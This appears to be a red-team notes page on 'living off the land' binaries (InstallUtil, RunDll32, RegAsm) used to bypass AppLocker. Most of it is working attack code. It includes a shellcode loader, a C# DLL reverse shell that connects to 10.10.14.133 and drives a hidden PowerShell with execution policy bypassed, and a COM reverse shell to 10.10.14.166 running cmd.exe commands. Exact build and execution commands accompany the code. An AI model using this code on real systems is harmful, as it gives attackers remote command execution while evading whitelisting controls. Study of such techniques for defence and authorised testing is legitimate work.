LOLBAS / LOLDrivers / LOLESXi
LOLBAS
InstallUtil
PS C:\Users\max> Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
FilePath PolicyDecision MatchingRule
-------- -------------- ------------
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Allowed (Default Rule) All files located in the Windows folderVisual Studio - Project > Add Reference... menu
Browse... and select
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dllusing System;
using System.Configuration.Install;
public class NotMalware_IU
{
public static void Main(string[] args)
{
}
}
[System.ComponentModel.RunInstaller(true)]
public class A : System.Configuration.Install.Installer
{
[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, UInt32 flNewProtect, out UInt32 lpflOldProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
public override void Uninstall(System.Collections.IDictionary savedState)
{
// Shellcode (micr0_shell)
string bufEnc = "<SNIP>";
// Decrypt shellcode
<SNIP>
}
}Exploit:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Tools\NotMalware_IU\NotMalware_IU\bin\x64\Release\NotMalware_IU.exeRunDll32
PS C:\Users\max> Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path C:\Windows\System32\rundll32.exe
FilePath PolicyDecision MatchingRule
-------- -------------- ------------
C:\Windows\System32\rundll32.exe Allowed (Default Rule) All files located in the Windows folder
Class Library (.NET Framework)
Project > Manage NuGet Packages...
Settings (gear) icon
Uncheck the first two checkboxes
Select package source and select DllExport. Next, click Install and then Apply
Mark Installed checkbox, and then click Apply
Reload All.
using System;
using System.IO;
using System.Net.Sockets;
using System.Diagnostics;
using rundll;
namespace RShell
{
internal class Program
{
private static StreamWriter streamWriter; // Needs to be global so that HandleDataReceived() can access it
[DllExport("DllMain")]
public static void DllMain()
{
try
{
// Connect to <IP> on <Port>/TCP
TcpClient client = new TcpClient();
client.Connect("10.10.14.133", 1010);
// Set up input/output streams
Stream stream = client.GetStream();
StreamReader streamReader = new StreamReader(stream);
streamWriter = new StreamWriter(stream);
// Define a hidden PowerShell (-ep bypass -nologo) process with STDOUT/ERR/IN all redirected
Process p = new Process();
p.StartInfo.FileName = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"; //32-bit version
p.StartInfo.Arguments = "-ep bypass -nologo";
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.RedirectStandardInput = true;
p.OutputDataReceived += new DataReceivedEventHandler(HandleDataReceived);
p.ErrorDataReceived += new DataReceivedEventHandler(HandleDataReceived);
// Start process and begin reading output
p.Start();
p.BeginOutputReadLine();
p.BeginErrorReadLine();
// Re-route user-input to STDIN of the PowerShell process
// If we see the user sent "exit", we can stop
string userInput = "";
while (!userInput.Equals("exit"))
{
userInput = streamReader.ReadLine();
p.StandardInput.WriteLine(userInput);
}
// Wait for PowerShell to exit (based on user-inputted exit), and close the process
p.WaitForExit();
client.Close();
}
catch (Exception) { }
}
private static void HandleDataReceived(object sender, DataReceivedEventArgs e)
{
if (e.Data != null)
{
streamWriter.WriteLine(e.Data);
streamWriter.Flush();
}
}
}
}Build: Release - Any CPU (because powershell 32-bit version used)
Exploitation:
C:\Windows\System32\RunDll32.exe C:\Tools\rundll\rundll\bin\Release\x86\rundll.dll,DllMainTool - ExecIT
Wevtutil.exe
Regasm - Bypass AppLocker to RShell
Generate a private and a public key pair and these values will be written into a file called key.snk
C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools>sn.exe -k key.snk
Microsoft (R) .NET Framework Strong Name Utility Version 4.0.30319.0
Copyright (c) Microsoft Corporation. All rights reserved.
Key pair written to key.snkor
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> $Content = [System.Convert]::FromBase64String($key)
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> Set-Content key.snk -Value $Content -Encoding ByteProjet visual studio Class Library (.NET Framework) - Project Name RegasmDLL
Change class1.cs to Regasm.cs
using System;
using System.EnterpriseServices;
using System.IO;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Text;
namespace regsvcser
{
public class Bypass : ServicedComponent
{
public Bypass() { Console.WriteLine("I am a basic COM Object"); }
[ComRegisterFunction] // This executes if registration is successful
public static void RegisterClass(string key)
{
Console.WriteLine("I shouldn't really execute");
Shellcode.Exec();
}
[ComUnregisterFunction] // This executes if registration fails
public static void UnRegisterClass(string key)
{
Console.WriteLine("I shouldn't really execute either.");
Shellcode.Exec();
}
}
public class Shellcode
{
public static void Exec()
{
string serverIp = "10.10.14.166"; // Replace with the attacker's IP
int serverPort = 8080; // Replace with the attacker's port
try
{
using (TcpClient client = new TcpClient(serverIp, serverPort))
using (NetworkStream stream = client.GetStream())
using (StreamReader reader = new StreamReader(stream))
using (StreamWriter writer = new StreamWriter(stream) { AutoFlush = true })
{
Console.WriteLine("Connected to server");
while (true)
{
// Read command from server
string command = reader.ReadLine();
if (command == null || command.ToLower() == "exit")
break;
// Execute command
try
{
var process = new System.Diagnostics.Process
{
StartInfo = new System.Diagnostics.ProcessStartInfo
{
FileName = "cmd.exe",
Arguments = "/c " + command,
RedirectStandardOutput = true,
RedirectStandardError = true,
UseShellExecute = false,
CreateNoWindow = true
}
};
process.Start();
string output = process.StandardOutput.ReadToEnd();
string error = process.StandardError.ReadToEnd();
process.WaitForExit();
writer.WriteLine(output);
writer.WriteLine(error);
}
catch (Exception ex)
{
writer.WriteLine("Error: " + ex.Message);
}
}
}
}
catch (Exception ex)
{
Console.WriteLine("Error: " + ex.Message);
}
}
}
}
Compile
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /target:library /out:C:\Tools\RegasmDLL\Regasm.dll /keyfile:key.snk C:\Tools\RegasmDLL\RegasmDLL\Regasm.cs
Microsoft (R) Visual C# Compiler version 4.8.4161.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240Exploit
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe /U C:\Tools\RegasmDLL\Regasm.dll
Microsoft .NET Framework Assembly Registration Utility version 4.8.4161.0
for Microsoft .NET Framework version 4.8.4161.0
Copyright (C) Microsoft Corporation. All rights reserved.
I shouldn't really execute either.
Connected to serverLOLDrivers
Living off the land drivers
LOLESXi
Living Off The Land ESXi
Living-off-the-COM-Type-Coercion-Abuse
Interesting Books
Interesting BooksEvading EDR: The Definitive Guide to Defeating Endpoint Detection Systems The author uses his years of experience as a red team operator to investigate each of the most common sensor components, discussing their purpose, explaining their implementation, and showing the ways they collect various data points from the Microsoft operating system. In addition to covering the theory behind designing an effective EDR, each chapter also reveals documented evasion strategies for bypassing EDRs that red teamers can use in their engagements.
Last updated